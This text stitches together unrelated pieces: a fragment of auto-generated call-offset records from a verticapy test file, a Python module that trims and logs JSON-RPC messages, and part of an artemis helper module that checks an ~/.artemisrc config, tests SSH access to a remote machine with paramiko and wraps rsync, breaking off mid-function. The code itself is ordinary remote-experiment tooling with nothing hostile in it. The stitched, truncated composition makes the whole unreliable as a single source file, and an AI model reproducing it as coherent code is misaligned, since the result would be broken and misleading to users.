10674), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (10672, 10674), True, 'import matplotlib.pyplot as plt\n'), ((10847, 10858), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (10856, 10858), True, 'import matplotlib.pyplot as plt\n'), ((11195, 11206), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11204, 11206), True, 'import matplotlib.pyplot as plt\n'), ((11407, 11418), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11416, 11418), True, 'import matplotlib.pyplot as plt\n'), ((11949, 11960), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11958, 11960), True, 'import matplotlib.pyplot as plt\n'), ((12150, 12161), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12159, 12161), True, 'import matplotlib.pyplot as plt\n'), ((12375, 12386), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12384, 12386), True, 'import matplotlib.pyplot as plt\n'), ((12684, 12695), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12693, 12695), True, 'import matplotlib.pyplot as plt\n'), ((13167, 13178), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (13176, 13178), True, 'import matplotlib.pyplot as plt\n'), ((13435, 13446), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (13444, 13446), True, 'import matplotlib.pyplot as plt\n'), ((13656, 13667), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (13665, 13667), True, 'import matplotlib.pyplot as plt\n'), ((14042, 14053), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14051, 14053), True, 'import matplotlib.pyplot as plt\n'), ((14392, 14403), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14401, 14403), True, 'import matplotlib.pyplot as plt\n'), ((14805, 14816), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (14814, 14816), True, 'import matplotlib.pyplot as plt\n'), 
((15173, 15184), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15182, 15184), True, 'import matplotlib.pyplot as plt\n'), ((15316, 15327), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15325, 15327), True, 'import matplotlib.pyplot as plt\n'), ((2711, 2744), 'pytest.approx', 'pytest.approx', (['(0.7965964343598055)'], {}), '(0.7965964343598055)\n', (2724, 2744), False, 'import pytest, datetime, warnings\n'), ((2840, 2874), 'pytest.approx', 'pytest.approx', (['(0.12236628849270664)'], {}), '(0.12236628849270664)\n', (2853, 2874), False, 'import pytest, datetime, warnings\n'), ((2938, 2971), 'pytest.approx', 'pytest.approx', (['(42.694100000000006)'], {}), '(42.694100000000006)\n', (2951, 2971), False, 'import pytest, datetime, warnings\n'), ((3189, 3207), 'pytest.approx', 'pytest.approx', (['(391)'], {}), '(391)\n', (3202, 3207), False, 'import pytest, datetime, warnings\n'), ((3304, 3321), 'pytest.approx', 'pytest.approx', (['(34)'], {}), '(34)\n', (3317, 3321), False, 'import pytest, datetime, warnings\n'), ((3386, 3419), 'pytest.approx', 'pytest.approx', (['(102.46583999999999)'], {}), '(102.46583999999999)\n', (3399, 3419), False, 'import pytest, datetime, warnings\n'), ((4010, 4021), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4019, 4021), True, 'import matplotlib.pyplot as plt\n'), ((4234, 4268), 'pytest.approx', 'pytest.approx', (['(0.38782051282051283)'], {}), '(0.38782051282051283)\n', (4247, 4268), False, 'import pytest, datetime, warnings\n'), ((4365, 4398), 'pytest.approx', 'pytest.approx', (['(0.6121794871794872)'], {}), '(0.6121794871794872)\n', (4378, 4398), False, 'import pytest, datetime, warnings\n'), ((4619, 4653), 'pytest.approx', 'pytest.approx', (['(0.09805510534846029)'], {}), '(0.09805510534846029)\n', (4632, 4653), False, 'import pytest, datetime, warnings\n'), ((4750, 4784), 'pytest.approx', 'pytest.approx', (['(-0.1547811993517018)'], {}), '(-0.1547811993517018)\n', (4763, 4784), False, 'import pytest, datetime, warnings\n'), ((5036, 5062), 'pytest.approx', 'pytest.approx', (['(16.07647847)'], {}), '(16.07647847)\n', (5049, 5062), False, 'import pytest, datetime, warnings\n'), ((5163, 5183), 'pytest.approx', 'pytest.approx', (['(36.25)'], {}), '(36.25)\n', (5176, 5183), False, 'import pytest, datetime, warnings\n'), ((5403, 5425), 'pytest.approx', 'pytest.approx', (['(31.3875)'], {}), '(31.3875)\n', (5416, 5425), False, 'import pytest, datetime, warnings\n'), ((5526, 5549), 'pytest.approx', 'pytest.approx', (['(512.3292)'], {}), '(512.3292)\n', (5539, 5549), False, 'import pytest, datetime, warnings\n'), ((6581, 6645), 'verticapy.create_verticapy_schema', 'create_verticapy_schema', (["iris_vd._VERTICAPY_VARIABLES_['cursor']"], {}), "(iris_vd._VERTICAPY_VARIABLES_['cursor'])\n", (6604, 6645), False, 'from verticapy import vDataFrame, drop_table, create_verticapy_schema\n'), ((6930, 6941), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6939, 6941), True, 'import matplotlib.pyplot as plt\n'), ((7213, 7224), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7222, 7224), True, 'import matplotlib.pyplot as plt\n'), ((8178, 8213), 'pytest.approx', 'pytest.approx', (['(80.00000007967)', '(0.01)'], {}), '(80.00000007967, 0.01)\n', (8191, 8213), False, 'import pytest, datetime, warnings\n'), ((8302, 8331), 'pytest.approx', 'pytest.approx', (['(512.3292)', '(0.01)'], {}), '(512.3292, 0.01)\n', (8315, 8331), False, 'import pytest, datetime, warnings\n'), ((8583, 8618), 'pytest.approx', 'pytest.approx', 
(['(0.050243111831442464)'], {}), '(0.050243111831442464)\n', (8596, 8618), False, 'import pytest, datetime, warnings\n'), ((8715, 8750), 'pytest.approx', 'pytest.approx', (['(0.029983792544570502)'], {}), '(0.029983792544570502)\n', (8728, 8750), False, 'import pytest, datetime, warnings\n'), ((8814, 8839), 'pytest.approx', 'pytest.approx', (['(7.24272727)'], {}), '(7.24272727)\n', (8827, 8839), False, 'import pytest, datetime, warnings\n'), ((9076, 9108), 'pytest.approx', 'pytest.approx', (['(0.534653465346535)'], {}), '(0.534653465346535)\n', (9089, 9108), False, 'import pytest, datetime, warnings\n'), ((9206, 9238), 'pytest.approx', 'pytest.approx', (['(0.354838709677419)'], {}), '(0.354838709677419)\n', (9219, 9238), False, 'import pytest, datetime, warnings\n'), ((9281, 9298), 'pytest.approx', 'pytest.approx', (['(15)'], {}), '(15)\n', (9294, 9298), False, 'import pytest, datetime, warnings\n'), ((9915, 9926), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9924, 9926), True, 'import matplotlib.pyplot as plt\n'), ((10118, 10152), 'pytest.approx', 'pytest.approx', (['(0.07374392220421394)'], {}), '(0.07374392220421394)\n', (10131, 10152), False, 'import pytest, datetime, warnings\n'), ((10250, 10283), 'pytest.approx', 'pytest.approx', (['(0.4327390599675851)'], {}), '(0.4327390599675851)\n', (10263, 10283), False, 'import pytest, datetime, warnings\n'), ((10631, 10654), 'pytest.approx', 'pytest.approx', (['(0.227753)'], {}), '(0.227753)\n', (10644, 10654), False, 'import pytest, datetime, warnings\n'), ((11168, 11186), 'pytest.approx', 'pytest.approx', (['(302)'], {}), '(302)\n', (11181, 11186), False, 'import pytest, datetime, warnings\n'), ((11617, 11636), 'pytest.approx', 'pytest.approx', (['(0.75)'], {}), '(0.75)\n', (11630, 11636), False, 'import pytest, datetime, warnings\n'), ((11668, 11686), 'pytest.approx', 'pytest.approx', (['(1.0)'], {}), '(1.0)\n', (11681, 11686), False, 'import pytest, datetime, warnings\n'), ((11718, 11750), 'pytest.approx', 'pytest.approx', (['(0.782608695652174)'], {}), '(0.782608695652174)\n', (11731, 11750), False, 'import pytest, datetime, warnings\n'), ((11782, 11800), 'pytest.approx', 'pytest.approx', (['(1.0)'], {}), '(1.0)\n', (11795, 11800), False, 'import pytest, datetime, warnings\n'), ((11832, 11852), 'pytest.approx', 'pytest.approx', (['(0.875)'], {}), '(0.875)\n', (11845, 11852), False, 'import pytest, datetime, warnings\n'), ((11884, 11904), 'pytest.approx', 'pytest.approx', (['(0.375)'], {}), '(0.375)\n', (11897, 11904), False, 'import pytest, datetime, warnings\n'), ((12651, 12675), 'pytest.approx', 'pytest.approx', (['(239)', '(0.01)'], {}), '(239, 0.01)\n', (12664, 12675), False, 'import pytest, datetime, warnings\n'), ((12965, 12990), 'datetime.date', 'datetime.date', (['(1998)', '(1)', '(1)'], {}), '(1998, 1, 1)\n', (12978, 12990), False, 'import pytest, datetime, warnings\n'), ((13023, 13049), 'datetime.date', 'datetime.date', (['(2017)', '(11)', '(1)'], {}), '(2017, 11, 1)\n', (13036, 13049), False, 'import pytest, datetime, warnings\n'), ((13081, 13099), 'pytest.approx', 'pytest.approx', (['(0.0)'], {}), '(0.0)\n', (13094, 13099), False, 'import pytest, datetime, warnings\n'), ((13132, 13158), 'pytest.approx', 'pytest.approx', (['(651.2962963)'], {}), '(651.2962963)\n', (13145, 13158), False, 'import pytest, datetime, warnings\n'), ((3847, 3866), 'pytest.approx', 'pytest.approx', (['(50.0)'], {}), '(50.0)\n', (3860, 3866), False, 'import pytest, datetime, warnings\n'), ((3975, 3997), 'pytest.approx', 'pytest.approx', 
(['(77.9583)'], {}), '(77.9583)\n', (3988, 3997), False, 'import pytest, datetime, warnings\n'), ((9728, 9760), 'pytest.approx', 'pytest.approx', (['(0.964285714285714)'], {}), '(0.964285714285714)\n', (9741, 9760), False, 'import pytest, datetime, warnings\n'), ((9870, 9902), 'pytest.approx', 'pytest.approx', (['(0.325581395348837)'], {}), '(0.325581395348837)\n', (9883, 9902), False, 'import pytest, datetime, warnings\n')]
|
"""Logging"""
import json
import logging
from typing import Any, Dict, List, Optional, Union, cast
def _trim_string(message: str) -> str:
longest_string = 30
if len(message) > longest_string:
prefix_len = int(longest_string / 3)
suffix_len = prefix_len
return message[:prefix_len] + "..." + message[-suffix_len:]
return message
def _trim_dict(message_obj: Dict[str, Any]) -> Dict[str, Any]:
result = {}
longest_list = 30
for k, val in message_obj.items():
if isinstance(val, str):
result[k] = _trim_string(val)
elif isinstance(val, list) and len(val) > longest_list:
prefix_len = int(longest_list / 3)
suffix_len = prefix_len
result[k] = cast(str, val[:prefix_len] + ["..."] + val[-suffix_len:])
elif isinstance(val, dict):
result[k] = cast(str, _trim_values(val))
else:
result[k] = val
return result
def _trim_values(message_obj: Union[Dict, List]) -> Union[Dict, List]:
# Batch?
if isinstance(message_obj, list):
return [_trim_dict(i) for i in message_obj]
else:
return _trim_dict(message_obj)
def _trim_message(message: str) -> str:
# Attempt to deserialize
try:
message_obj = json.loads(message)
except ValueError:
# Could not be deserialized, trim the string anyway.
return _trim_string(str(message))
else:
return json.dumps(_trim_values(message_obj))
def log_(
message: str,
logger: logging.Logger,
level: str = "info",
extra: Optional[Dict] = None,
trim: bool = False,
) -> None:
"""
Log a request or response
:param message: JSON-RPC request or response string.
:param logger: logging.Logger
:param level: Log level.
:param extra: More details to include in the log entry.
:param trim: Abbreviate log messages.
:return:
"""
if extra is None:
extra = {}
# Clean up the message for logging
if message:
        message = message.replace("\n", "").replace("  ", " ").replace("{ ", "{")
if trim:
message = _trim_message(message)
# Log.
getattr(logger, level)(message, extra=extra)
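# Usage sketch (added for illustration; the logger name is hypothetical):
# exercise log_ with a long string value so the trimming path is visible.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    example_logger = logging.getLogger("example")
    request = '{"jsonrpc": "2.0", "method": "ping", "params": {"note": "' + "x" * 50 + '"}, "id": 1}'
    log_(request, example_logger, level="debug", trim=True)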
|
[
"typing.cast",
"json.loads"
] |
[((1290, 1309), 'json.loads', 'json.loads', (['message'], {}), '(message)\n', (1300, 1309), False, 'import json\n'), ((756, 813), 'typing.cast', 'cast', (['str', "(val[:prefix_len] + ['...'] + val[-suffix_len:])"], {}), "(str, val[:prefix_len] + ['...'] + val[-suffix_len:])\n", (760, 813), False, 'from typing import Any, Dict, List, Optional, Union, cast\n')]
|
# Copyright (C) 2016 Intel Corporation
# Released under the MIT license (see COPYING.MIT)
from oeqa.core.case import OETestCase
from oeqa.core.decorator.oetag import OETestTag
from oeqa.core.decorator.data import OETestDataDepends
class DataTest(OETestCase):
data_vars = ['IMAGE', 'ARCH']
@OETestDataDepends(['MACHINE',])
@OETestTag('dataTestOk')
def testDataOk(self):
self.assertEqual(self.td.get('IMAGE'), 'core-image-minimal')
self.assertEqual(self.td.get('ARCH'), 'x86')
self.assertEqual(self.td.get('MACHINE'), 'qemuarm')
@OETestTag('dataTestFail')
def testDataFail(self):
pass
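# Note: these cases assume the harness supplies a test data dictionary
# self.td with IMAGE='core-image-minimal', ARCH='x86' and MACHINE='qemuarm';
# OETestDataDepends additionally marks MACHINE as a required variable for
# testDataOk.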
|
[
"oeqa.core.decorator.data.OETestDataDepends",
"oeqa.core.decorator.oetag.OETestTag"
] |
[((301, 331), 'oeqa.core.decorator.data.OETestDataDepends', 'OETestDataDepends', (["['MACHINE']"], {}), "(['MACHINE'])\n", (318, 331), False, 'from oeqa.core.decorator.data import OETestDataDepends\n'), ((338, 361), 'oeqa.core.decorator.oetag.OETestTag', 'OETestTag', (['"""dataTestOk"""'], {}), "('dataTestOk')\n", (347, 361), False, 'from oeqa.core.decorator.oetag import OETestTag\n'), ((576, 601), 'oeqa.core.decorator.oetag.OETestTag', 'OETestTag', (['"""dataTestFail"""'], {}), "('dataTestFail')\n", (585, 601), False, 'from oeqa.core.decorator.oetag import OETestTag\n')]
|
# coding: utf-8
"""
This module contains the paths for all of this project's directories,
which we create dynamically.
All paths are absolute, without symlinks, and in unicode.
We also add the 'apps' and 'libs' directories to the PYTHON PATH, which
makes imports much easier.
"""
import sys
import os
import tempfile
from pathlib import Path
# This part is a bit complicated and is not mandatory for your project, but
# it makes the project completely portable, since all directory paths are
# generated dynamically instead of being hard coded.
# We get the 'settings.py' file path (the __file__ variable automatically
# contains the path of the current file) and wrap it in a Path object so it
# is handled correctly even if the name contains non-ASCII characters
# (sys.getfilesystemencoding() gives us the file system encoding, which can
# differ between Windows, Mac and Linux).
THIS_FILE = Path(__file__)
# We dynamically create these settings, giving us the absolute path
# to the project directory, the root directory containing all our work
# and any other directory we might need
PROJECT_DIR = THIS_FILE.absolute().resolve()
BASE_DIR = PROJECT_DIR.parent.parent
APPS_DIR = BASE_DIR / 'apps'
LIBS_DIR = BASE_DIR / 'ignore_this_directory'
TEMP_DIR = Path(tempfile.gettempdir())
# We add the apps and libs directories to the PYTHON PATH, so we can import
# each package without prefixing it with the parent package name. This mimics
# the behavior we would have if they were at the root directory or installed
# with pip.
#
# E.g.: we can do "from app1_hello.views import hello" instead of
# "from apps.app1_hello.views import hello", or "import django" instead of
# "from libs import django".
#
# When you have a small project, you can avoid this and put all apps at the
# root dir like in the official Django tutorial, but in a big project with a
# lot of apps, you usually put them all in an "apps" dir like we did, so it's
# a good thing to know.
sys.path.append(str(LIBS_DIR))
sys.path.append(str(APPS_DIR))
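# Quick sanity check (added for illustration): print the resolved directories
# to confirm the dynamic paths behave as described above.
if __name__ == "__main__":
    print(PROJECT_DIR, BASE_DIR, APPS_DIR, LIBS_DIR, TEMP_DIR, sep="\n")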
|
[
"pathlib.Path",
"tempfile.gettempdir"
] |
[((911, 925), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (915, 925), False, 'from pathlib import Path\n'), ((1279, 1300), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (1298, 1300), False, 'import tempfile\n')]
|
# coding: utf-8
"""
test_shopidown
----------------------------------
Tests for `shopidown` module.
"""
import textwrap
from shopidown.parser import Parser
parser = Parser()
def test_title():
""" Tests that a title parsers to h1 tag """
assert parser.parse("# Title *italic* **bold**") == "<h1>Title <em>italic</em> <strong>bold</strong></h1>"
def test_invalid_em_title():
"""
Tests that a title without two 'em' marks
    still parses to an h1 tag
"""
assert parser.parse("# Title *italic **bold**") == "<h1>Title *italic <strong>bold</strong></h1>"
def test_invalid_strong_title():
"""
Tests that a title without two 'strong' marks
    still parses to an h1 tag
"""
assert parser.parse("# Title *italic* **bold") == "<h1>Title <em>italic</em> **bold</h1>"
def test_subtitle():
""" Tests that a subtitle parsers to h2 tags """
assert parser.parse("## Subtitle") == "<h2>Subtitle</h2>"
def test_pseudo_subtitle():
""" Tests that a pseudo subtitle parsers to a paragraph """
assert parser.parse("Subtitle## ") == "<p>Subtitle## </p>"
def test_parse_unordered_list():
""" Tests that we can parse an unordered list """
input_text = textwrap.dedent("""\
- list item 1
- list item 2
""")
output_text = textwrap.dedent("""\
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
""")
assert parser.parse(input_text) == output_text
def test_parse_ordered_list():
""" Tests that we can parse an ordered list """
input_text = textwrap.dedent("""\
1. ordered item 1
2. ordered item 2
""")
output_text = textwrap.dedent("""\
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
""")
assert parser.parse(input_text) == output_text
def test_lists():
""" Test that we can parse ul and ol """
input_text = textwrap.dedent("""\
- list item 1
- list item 2
1. ordered item 1
2. ordered item 2
""")
output_text = textwrap.dedent("""\
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
""")
assert parser.parse(input_text) == output_text
def test_inverted_lists():
""" Test that we can parse ol and ul """
input_text = textwrap.dedent("""\
1. ordered item 1
2. ordered item 2
- list item 1
- list item 2
""")
output_text = textwrap.dedent("""\
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
""")
assert parser.parse(input_text) == output_text
def test_guilhaume_markdown_text():
""" Test that we can parse the markdown text Guillaume wrote """
input_text = textwrap.dedent("""\
# Title *italic* **bold**
## Subtitle
Paragraph1
Paragraph2
- list item 1
- list item 2
1. ordered item 1
2. ordered item 2
""")
output_text = textwrap.dedent("""\
<h1>Title <em>italic</em> <strong>bold</strong></h1>
<h2>Subtitle</h2>
<p>Paragraph1</p>
<p>Paragraph2</p>
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
""")
assert parser.parse(input_text) == output_text
def test_improved_guilhaume_markdown_text():
"""
Test that we can parse an improved version of
the markdown text Guillaume wrote
"""
input_text = textwrap.dedent("""\
# Title *italic* **bold**
## Subtitle
Paragraph1
Paragraph2
- list item 1
- list item 2
1. ordered item 1
2. ordered item 2
## Subtitle
Paragraph1
Paragraph2
# Title *italic* **bold**
1. ordered item 1
2. ordered item 2
3. ordered item 3
4. ordered item 4
- list item 1
- list item 2
- list item 3
- list item 4
""")
output_text = textwrap.dedent("""\
<h1>Title <em>italic</em> <strong>bold</strong></h1>
<h2>Subtitle</h2>
<p>Paragraph1</p>
<p>Paragraph2</p>
<ul>
<li>list item 1</li>
<li>list item 2</li>
</ul>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
</ol>
<h2>Subtitle</h2>
<p>Paragraph1</p>
<p>Paragraph2</p>
<h1>Title <em>italic</em> <strong>bold</strong></h1>
<ol>
<li>ordered item 1</li>
<li>ordered item 2</li>
<li>ordered item 3</li>
<li>ordered item 4</li>
</ol>
<ul>
<li>list item 1</li>
<li>list item 2</li>
<li>list item 3</li>
<li>list item 4</li>
</ul>
""")
assert parser.parse(input_text) == output_text
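# Usage sketch (added for illustration), restating mappings verified above:
#   parser.parse("# Title *italic* **bold**")
#       -> "<h1>Title <em>italic</em> <strong>bold</strong></h1>"
#   parser.parse("## Subtitle") -> "<h2>Subtitle</h2>"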
|
[
"textwrap.dedent",
"shopidown.parser.Parser"
] |
[((172, 180), 'shopidown.parser.Parser', 'Parser', ([], {}), '()\n', (178, 180), False, 'from shopidown.parser import Parser\n'), ((1197, 1260), 'textwrap.dedent', 'textwrap.dedent', (['""" - list item 1\n - list item 2\n """'], {}), '(""" - list item 1\n - list item 2\n """)\n', (1212, 1260), False, 'import textwrap\n'), ((1282, 1392), 'textwrap.dedent', 'textwrap.dedent', (['""" <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """'], {}), '(\n """ <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """\n )\n', (1297, 1392), False, 'import textwrap\n'), ((1539, 1610), 'textwrap.dedent', 'textwrap.dedent', (['""" 1. ordered item 1\n 2. ordered item 2\n """'], {}), '(""" 1. ordered item 1\n 2. ordered item 2\n """)\n', (1554, 1610), False, 'import textwrap\n'), ((1632, 1748), 'textwrap.dedent', 'textwrap.dedent', (['""" <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """'], {}), '(\n """ <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """\n )\n', (1647, 1748), False, 'import textwrap\n'), ((1876, 1994), 'textwrap.dedent', 'textwrap.dedent', (['""" - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n """'], {}), '(\n """ - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n """\n )\n', (1891, 1994), False, 'import textwrap\n'), ((2006, 2196), 'textwrap.dedent', 'textwrap.dedent', (['""" <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """'], {}), '(\n """ <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """\n )\n', (2021, 2196), False, 'import textwrap\n'), ((2332, 2450), 'textwrap.dedent', 'textwrap.dedent', (['""" 1. ordered item 1\n 2. ordered item 2\n\n - list item 1\n - list item 2\n """'], {}), '(\n """ 1. ordered item 1\n 2. ordered item 2\n\n - list item 1\n - list item 2\n """\n )\n', (2347, 2450), False, 'import textwrap\n'), ((2462, 2652), 'textwrap.dedent', 'textwrap.dedent', (['""" <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """'], {}), '(\n """ <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n """\n )\n', (2477, 2652), False, 'import textwrap\n'), ((2821, 3019), 'textwrap.dedent', 'textwrap.dedent', (['""" # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n """'], {}), '(\n """ # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. 
ordered item 2\n """\n )\n', (2836, 3019), False, 'import textwrap\n'), ((3031, 3348), 'textwrap.dedent', 'textwrap.dedent', (['""" <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """'], {}), '(\n """ <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n """\n )\n', (3046, 3348), False, 'import textwrap\n'), ((3561, 4001), 'textwrap.dedent', 'textwrap.dedent', (['""" # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n # Title *italic* **bold**\n\n 1. ordered item 1\n 2. ordered item 2\n 3. ordered item 3\n 4. ordered item 4\n\n - list item 1\n - list item 2\n - list item 3\n - list item 4\n """'], {}), '(\n """ # Title *italic* **bold**\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n - list item 1\n - list item 2\n\n 1. ordered item 1\n 2. ordered item 2\n\n ## Subtitle\n\n Paragraph1\n\n Paragraph2\n\n # Title *italic* **bold**\n\n 1. ordered item 1\n 2. ordered item 2\n 3. ordered item 3\n 4. ordered item 4\n\n - list item 1\n - list item 2\n - list item 3\n - list item 4\n """\n )\n', (3576, 4001), False, 'import textwrap\n'), ((4013, 4725), 'textwrap.dedent', 'textwrap.dedent', (['""" <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n <li>ordered item 3</li>\n <li>ordered item 4</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n <li>list item 3</li>\n <li>list item 4</li>\n </ul>\n """'], {}), '(\n """ <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n </ul>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n </ol>\n\n <h2>Subtitle</h2>\n\n <p>Paragraph1</p>\n\n <p>Paragraph2</p>\n\n <h1>Title <em>italic</em> <strong>bold</strong></h1>\n\n <ol>\n <li>ordered item 1</li>\n <li>ordered item 2</li>\n <li>ordered item 3</li>\n <li>ordered item 4</li>\n </ol>\n\n <ul>\n <li>list item 1</li>\n <li>list item 2</li>\n <li>list item 3</li>\n <li>list item 4</li>\n </ul>\n """\n )\n', (4028, 4725), False, 'import textwrap\n')]
|
from __future__ import print_function
import os
from ConfigParser import NoSectionError, NoOptionError
import paramiko
from artemis.config import get_artemis_config_value
from artemis.fileman.config_files import get_config_value
from artemis.remote.utils import get_ssh_connection
def check_config_file(ip_address,file_path=".artemisrc"):
'''
    Makes sure all required fields are present in ~/.artemisrc.
Also performs test for the different options if applicable
:param ip_address: The section to look for. Remote ip is assumed. Makes no sense for local ip.
:return:
'''
mandatory_options = ["username","python"]
artemisrc_path = os.path.expanduser("~/%s"%file_path)
for option in mandatory_options:
try:
get_artemis_config_value(section=ip_address,option=option)
except NoSectionError:
print("Section %s could not be found in %s. Please provide it." %(ip_address, artemisrc_path))
raise
except NoOptionError:
print("Section %s does not contain option %s. Please provide it in %s" %(ip_address, option, artemisrc_path))
raise
# optional_options = ["private_key"]
try:
private_key_path = get_artemis_config_value(section=ip_address,option="private_key")
assert os.path.isfile(private_key_path), "The path to the private_key for %s you specified in %s is not valid. You provided %s" %(ip_address, artemisrc_path, private_key_path)
except NoOptionError:
pass
# username & private key setup tests:
try:
get_ssh_connection(ip_address)
except paramiko.ssh_exception.AuthenticationException as e:
if "Authentication failed" in e.message:
print("An AuthenticationException is being raised. Make sure you have your private key set up correctly")
else:
print("An AuthenticationException is being raised. Did you specify the correct username for %s in %s? You provided the username %s"% (ip_address, artemisrc_path, get_artemis_config_value(section=ip_address,option="username")))
raise
except paramiko.ssh_exception.SSHException:
try:
private_key_path = get_artemis_config_value(section=ip_address,option="private_key")
print ("Something is wrong with the private_key you specified in %s for %s . You provided %s" % (artemisrc_path, ip_address, private_key_path))
raise
except NoOptionError:
private_key_path = os.path.join(os.path.expanduser("~"),".ssh/id_rsa")
print("You did not provide a private_key path in %s. The default path %s appears to be wrongly set up. "
"Please make sure you have correctly set up your private key for %s " %(artemisrc_path,private_key_path,ip_address))
#python tests:
python_path = get_artemis_config_value(section=ip_address,option="python")
command = "python -c 'import os; print(os.path.isfile(os.path.expanduser(\"%s\")))'"%python_path
ssh_conn = get_ssh_connection(ip_address)
_,stdout,stderr = ssh_conn.exec_command(command)
assert stdout.read().strip()=="True", "The provided path to the remote python installation on %s does not exist. You provided %s" %(ip_address, python_path)
command = "%s -c 'print(\"Success\")'" % python_path
_,stdout,stderr = ssh_conn.exec_command(command)
err = stderr.read().strip()
assert stdout.read().strip()=="Success" and not err, "The provided python path on %s does not seem to point to a python executable. " \
"You provided %s, which resulted in the following error on the remote machine: " %(ip_address, python_path, err)
def simple_rsync(local_path, remote_path, ip_address, verbose=False):
'''
This method synchronizes local_path and all subfolders with remote_path at the given address.
This method executes a system rsync call. This is not a general wrapper for rsync. The call is blocking.
:param local_path:
:param remote_path: Assumed to be relative to the home dir
:param ip_address:
:return:
'''
options = "-ah"
if verbose:
options += "v"
local_path = os.path.expanduser(local_path)
username = get_artemis_config_value(section=ip_address, option="username")
if remote_path.startswith("~"):
remote_path = remote_path[1:]
if remote_path.startswith(("/")):
remote_path = remote_path[1:]
# to_path = "%s@%s:/home/%s/%s" % (username, address, username, remote_path)
to_path = "%s@%s:~/%s" % (username, ip_address, remote_path)
return rsync(options, from_path=local_path, to_path=to_path)
def rsync(options, from_path, to_path):
'''
basic rsync wrapper
:param options:
:param from_path:
:param to_path:
:return:
'''
import subprocess
print ("Starting: rsync %s %s %s" % (options, from_path, to_path))
if not type(options) is list:
options = [options]
